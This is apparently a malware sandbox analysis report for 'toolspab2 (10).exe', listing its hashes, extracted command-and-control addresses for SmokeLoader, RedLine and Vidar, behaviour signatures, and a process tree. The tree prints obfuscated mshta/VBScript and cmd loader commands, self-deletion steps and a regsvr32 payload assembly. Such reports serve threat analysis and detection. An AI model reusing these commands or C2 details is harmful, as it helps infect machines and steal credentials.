Overview

overview

10

Static

static

toolspab2 (1).exe

windows7_x64

10

toolspab2 (1).exe

windows10_x64

10

toolspab2 (10).exe

windows7_x64

10

toolspab2 (10).exe

windows10_x64

10

toolspab2 (11).exe

windows7_x64

10

toolspab2 (11).exe

windows10_x64

10

toolspab2 (12).exe

windows7_x64

10

toolspab2 (12).exe

windows10_x64

10

toolspab2 (13).exe

windows7_x64

10

toolspab2 (13).exe

windows10_x64

10

toolspab2 (14).exe

windows7_x64

10

toolspab2 (14).exe

windows10_x64

10

toolspab2 (15).exe

windows7_x64

10

toolspab2 (15).exe

windows10_x64

10

toolspab2 (16).exe

windows7_x64

10

toolspab2 (16).exe

windows10_x64

10

toolspab2 (17).exe

windows7_x64

10

toolspab2 (17).exe

windows10_x64

10

toolspab2 (18).exe

windows7_x64

10

toolspab2 (18).exe

windows10_x64

10

toolspab2 (19).exe

windows7_x64

10

toolspab2 (19).exe

windows10_x64

10

toolspab2 (2).exe

windows7_x64

10

toolspab2 (2).exe

windows10_x64

10

toolspab2 (20).exe

windows7_x64

10

toolspab2 (20).exe

windows10_x64

10

toolspab2 (21).exe

windows7_x64

10

toolspab2 (21).exe

windows10_x64

10

toolspab2 (22).exe

windows7_x64

10

toolspab2 (22).exe

windows10_x64

10

toolspab2 (23).exe

windows7_x64

10

toolspab2 (23).exe

windows10_x64

10

Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    104s
  • max time network
    203s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    08-07-2021 12:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    toolspab2 (10).exe

  • Size

    315KB

  • MD5

    1d20e1f65938e837ef1b88f10f1bd6c3

  • SHA1

    703d7098dbfc476d2181b7fc041cc23e49c368f1

  • SHA256

    05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d

  • SHA512

    f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196

Score
10/10
gluptebametasploitraccoonredlinesmokeloadersocelarstofseevidar824agressorbtconlybackdoordiscoverydropperevasioninfostealerloaderpersistencespywarestealertrojanvmprotect

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

agressor

C2

65.21.122.45:8085

Extracted

Family

vidar

Version

39.4

Botnet

824

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    824

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

BtcOnly

C2

185.53.46.82:3214

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar Stealer 2 IoCs
    stealer
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 14 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Deletes itself 1 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\toolspab2 (10).exe
    "C:\Users\Admin\AppData\Local\Temp\toolspab2 (10).exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3944
    • C:\Users\Admin\AppData\Local\Temp\toolspab2 (10).exe
      "C:\Users\Admin\AppData\Local\Temp\toolspab2 (10).exe"
      2⤵
      • Loads dropped DLL
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1060
  • C:\Users\Admin\AppData\Local\Temp\2BC4.exe
    C:\Users\Admin\AppData\Local\Temp\2BC4.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    PID:2000
  • C:\Users\Admin\AppData\Local\Temp\2E17.exe
    C:\Users\Admin\AppData\Local\Temp\2E17.exe
    1⤵
    • Executes dropped EXE
    PID:3776
  • C:\Users\Admin\AppData\Local\Temp\3348.exe
    C:\Users\Admin\AppData\Local\Temp\3348.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:4084
  • C:\Users\Admin\AppData\Local\Temp\37AE.exe
    C:\Users\Admin\AppData\Local\Temp\37AE.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1304
  • C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    1⤵
      PID:2144
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      1⤵
        PID:2108
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        1⤵
          PID:2172
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe
          1⤵
            PID:3904
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            1⤵
              PID:3612
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:2316
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:3944
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:2184
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:1368
                    • C:\Users\Admin\AppData\Local\Temp\AA7D.exe
                      C:\Users\Admin\AppData\Local\Temp\AA7D.exe
                      1⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      • Modifies system certificate store
                      PID:496
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im AA7D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\AA7D.exe" & del C:\ProgramData\*.dll & exit
                        2⤵
                          PID:1172
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im AA7D.exe /f
                            3⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3600
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 6
                            3⤵
                            • Delays execution with timeout.exe
                            PID:2660
                      • C:\Users\Admin\AppData\Local\Temp\AC34.exe
                        C:\Users\Admin\AppData\Local\Temp\AC34.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2944
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\AC34.exe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\AC34.exe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:736
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\AC34.exe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "" == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\AC34.exe" ) do taskkill -F -im "%~Nxw"
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3900
                            • C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe
                              ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT
                              4⤵
                              • Executes dropped EXE
                              PID:3572
                              • C:\Windows\SysWOW64\mshta.exe
                                "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if ""-pLTfn82smRxoqI1Rgg5LiENy6ewubmT "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                5⤵
                                  PID:1172
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "-pLTfn82smRxoqI1Rgg5LiENy6ewubmT " == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" ) do taskkill -F -im "%~Nxw"
                                    6⤵
                                      PID:2040
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" VbsCripT:cLose ( cReatEoBJEcT ( "WScript.sheLl" ). Run ( "CMd.EXe /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = ""MZ"" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P + WWAA.Ue5 + JBVF~.yS + rcEI.~+ Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U " , 0 , true ) )
                                    5⤵
                                      PID:3868
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = "MZ" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P +WWAA.Ue5 + JBVF~.yS + rcEI.~+Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U
                                        6⤵
                                          PID:2064
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo "
                                            7⤵
                                              PID:184
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>FIq2DqT_.Q"
                                              7⤵
                                                PID:1604
                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                regsvr32.exe -S ..\MRZCIH.DO /U
                                                7⤵
                                                • Loads dropped DLL
                                                • Suspicious use of NtCreateThreadExHideFromDebugger
                                                PID:1296
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill -F -im "AC34.exe"
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1736
                                  • C:\Users\Admin\AppData\Local\Temp\D5C5.exe
                                    C:\Users\Admin\AppData\Local\Temp\D5C5.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:4040
                                  • C:\Users\Admin\AppData\Local\Temp\D72E.exe
                                    C:\Users\Admin\AppData\Local\Temp\D72E.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:1808
                                    • C:\Users\Admin\AppData\Local\Temp\is-6C5UA.tmp\D72E.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-6C5UA.tmp\D72E.tmp" /SL5="$201F6,188175,104448,C:\Users\Admin\AppData\Local\Temp\D72E.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1020
                                      • C:\Users\Admin\AppData\Local\Temp\is-UU2KG.tmp\134 Vaporeondè_éçè_)))_.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-UU2KG.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1728
                                        • C:\Program Files\Microsoft Office 15\NOPTARLMZY\irecord.exe
                                          "C:\Program Files\Microsoft Office 15\NOPTARLMZY\irecord.exe" /VERYSILENT
                                          4⤵
                                            PID:4824
                                            • C:\Users\Admin\AppData\Local\Temp\is-ORKUJ.tmp\irecord.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-ORKUJ.tmp\irecord.tmp" /SL5="$E01DE,5808768,66560,C:\Program Files\Microsoft Office 15\NOPTARLMZY\irecord.exe" /VERYSILENT
                                              5⤵
                                                PID:4896
                                                • C:\Program Files (x86)\i-record\I-Record.exe
                                                  "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                  6⤵
                                                    PID:4112
                                              • C:\Users\Admin\AppData\Local\Temp\64-a5018-6b3-fcd86-9c56a04e5e438\Fyqavobari.exe
                                                "C:\Users\Admin\AppData\Local\Temp\64-a5018-6b3-fcd86-9c56a04e5e438\Fyqavobari.exe"
                                                4⤵
                                                  PID:4912
                                                • C:\Users\Admin\AppData\Local\Temp\79-1ef46-f6f-822b7-7d9f0775c2b0d\Fumeqifise.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\79-1ef46-f6f-822b7-7d9f0775c2b0d\Fumeqifise.exe"
                                                  4⤵
                                                    PID:4988
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\khzywclz.0qa\GcleanerEU.exe /eufive & exit
                                                      5⤵
                                                        PID:644
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yewm5n5f.sdy\installer.exe /qn CAMPAIGN="654" & exit
                                                        5⤵
                                                          PID:4608
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z3xxqmtd.mc1\Setup3310.exe /Verysilent /subid=623 & exit
                                                          5⤵
                                                            PID:5092
                                                            • C:\Users\Admin\AppData\Local\Temp\z3xxqmtd.mc1\Setup3310.exe
                                                              C:\Users\Admin\AppData\Local\Temp\z3xxqmtd.mc1\Setup3310.exe /Verysilent /subid=623
                                                              6⤵
                                                                PID:4624
                                                                • C:\Users\Admin\AppData\Local\Temp\is-BTTT9.tmp\Setup3310.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-BTTT9.tmp\Setup3310.tmp" /SL5="$202E2,138429,56832,C:\Users\Admin\AppData\Local\Temp\z3xxqmtd.mc1\Setup3310.exe" /Verysilent /subid=623
                                                                  7⤵
                                                                    PID:3200
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-2Q0B4.tmp\Setup.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-2Q0B4.tmp\Setup.exe" /Verysilent
                                                                      8⤵
                                                                        PID:5188
                                                                        • C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
                                                                          "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                          9⤵
                                                                            PID:5568
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-HL9FR.tmp\lylal220.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-HL9FR.tmp\lylal220.tmp" /SL5="$203FE,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                              10⤵
                                                                                PID:5764
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-VSHJK.tmp\èeèrgegdè_éçè_)))_.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-VSHJK.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal220
                                                                                  11⤵
                                                                                    PID:4312
                                                                                    • C:\Program Files\VideoLAN\RXBYXZHZJD\irecord.exe
                                                                                      "C:\Program Files\VideoLAN\RXBYXZHZJD\irecord.exe" /VERYSILENT
                                                                                      12⤵
                                                                                        PID:4288
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-JAOLS.tmp\irecord.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-JAOLS.tmp\irecord.tmp" /SL5="$105AC,5808768,66560,C:\Program Files\VideoLAN\RXBYXZHZJD\irecord.exe" /VERYSILENT
                                                                                          13⤵
                                                                                            PID:4996
                                                                                            • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                              "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                              14⤵
                                                                                                PID:2548
                                                                                          • C:\Users\Admin\AppData\Local\Temp\2b-7172c-552-9808b-cb8c362b4cb38\Suzhunerozhy.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\2b-7172c-552-9808b-cb8c362b4cb38\Suzhunerozhy.exe"
                                                                                            12⤵
                                                                                              PID:4872
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                dw20.exe -x -s 2020
                                                                                                13⤵
                                                                                                  PID:7008
                                                                                              • C:\Users\Admin\AppData\Local\Temp\20-e811e-376-3c0a6-55460995dbb98\Gaqaezhyvobo.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\20-e811e-376-3c0a6-55460995dbb98\Gaqaezhyvobo.exe"
                                                                                                12⤵
                                                                                                  PID:4712
                                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
                                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                            9⤵
                                                                                              PID:5544
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-16CJN.tmp\MediaBurner.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-16CJN.tmp\MediaBurner.tmp" /SL5="$203C4,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                10⤵
                                                                                                  PID:5784
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-FULNL.tmp\_____________bob.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-FULNL.tmp\_____________bob.exe" /S /UID=burnerch1
                                                                                                    11⤵
                                                                                                      PID:5452
                                                                                                      • C:\Program Files\Java\PLIMDPHQRF\ultramediaburner.exe
                                                                                                        "C:\Program Files\Java\PLIMDPHQRF\ultramediaburner.exe" /VERYSILENT
                                                                                                        12⤵
                                                                                                          PID:7132
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-PM6E3.tmp\ultramediaburner.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-PM6E3.tmp\ultramediaburner.tmp" /SL5="$202BC,281924,62464,C:\Program Files\Java\PLIMDPHQRF\ultramediaburner.exe" /VERYSILENT
                                                                                                            13⤵
                                                                                                              PID:5656
                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                14⤵
                                                                                                                  PID:4076
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9e-353f1-4c7-7efb6-5adc511abb898\Vuronogoxa.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\9e-353f1-4c7-7efb6-5adc511abb898\Vuronogoxa.exe"
                                                                                                              12⤵
                                                                                                                PID:6000
                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                  dw20.exe -x -s 1988
                                                                                                                  13⤵
                                                                                                                    PID:2316
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\e4-61bb4-6cf-c7cb9-7f46182c7a6b6\Hanogirana.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\e4-61bb4-6cf-c7cb9-7f46182c7a6b6\Hanogirana.exe"
                                                                                                                  12⤵
                                                                                                                    PID:5492
                                                                                                            • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                                                              "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                                                              9⤵
                                                                                                                PID:5536
                                                                                                                • C:\Users\Admin\AppData\Roaming\7407157.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\7407157.exe"
                                                                                                                  10⤵
                                                                                                                    PID:4664
                                                                                                                  • C:\Users\Admin\AppData\Roaming\6325547.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\6325547.exe"
                                                                                                                    10⤵
                                                                                                                      PID:1296
                                                                                                                    • C:\Users\Admin\AppData\Roaming\5461710.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\5461710.exe"
                                                                                                                      10⤵
                                                                                                                        PID:6004
                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                          11⤵
                                                                                                                            PID:6336
                                                                                                                      • C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe
                                                                                                                        "C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe"
                                                                                                                        9⤵
                                                                                                                          PID:5628
                                                                                                                        • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                                          "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
                                                                                                                          9⤵
                                                                                                                            PID:5604
                                                                                                                            • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                                              "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" -a
                                                                                                                              10⤵
                                                                                                                                PID:4532
                                                                                                                            • C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
                                                                                                                              "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                              9⤵
                                                                                                                                PID:5588
                                                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                9⤵
                                                                                                                                  PID:5524
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5524 -s 1224
                                                                                                                                    10⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:7104
                                                                                                                                • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                                                  "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                                                  9⤵
                                                                                                                                    PID:5504
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      10⤵
                                                                                                                                        PID:5864
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                        10⤵
                                                                                                                                          PID:6216
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksavljur.axa\google-game.exe & exit
                                                                                                                                5⤵
                                                                                                                                  PID:200
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ksavljur.axa\google-game.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ksavljur.axa\google-game.exe
                                                                                                                                    6⤵
                                                                                                                                      PID:4356
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ksavljur.axa\google-game.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\ksavljur.axa\google-game.exe" -a
                                                                                                                                        7⤵
                                                                                                                                          PID:5048
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xwyguial.kdo\BrowzarBrowser_J013.exe & exit
                                                                                                                                      5⤵
                                                                                                                                        PID:4188
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\xwyguial.kdo\BrowzarBrowser_J013.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\xwyguial.kdo\BrowzarBrowser_J013.exe
                                                                                                                                          6⤵
                                                                                                                                            PID:5080
                                                                                                                                            • C:\Program Files (x86)\Browzar\Browzar.exe
                                                                                                                                              "C:\Program Files (x86)\Browzar\Browzar.exe"
                                                                                                                                              7⤵
                                                                                                                                                PID:5636
                                                                                                                                              • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                                                                                "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                                                                                7⤵
                                                                                                                                                  PID:5496
                                                                                                                                                  • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                                                                                    "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                                                                                    8⤵
                                                                                                                                                      PID:6948
                                                                                                                                                    • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                                                                                      "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:7060
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pc0cmzey.dzv\GcleanerWW.exe /mixone & exit
                                                                                                                                                  5⤵
                                                                                                                                                    PID:4348
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jcnl3yze.hn3\toolspab1.exe & exit
                                                                                                                                                    5⤵
                                                                                                                                                      PID:5396
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jcnl3yze.hn3\toolspab1.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jcnl3yze.hn3\toolspab1.exe
                                                                                                                                                        6⤵
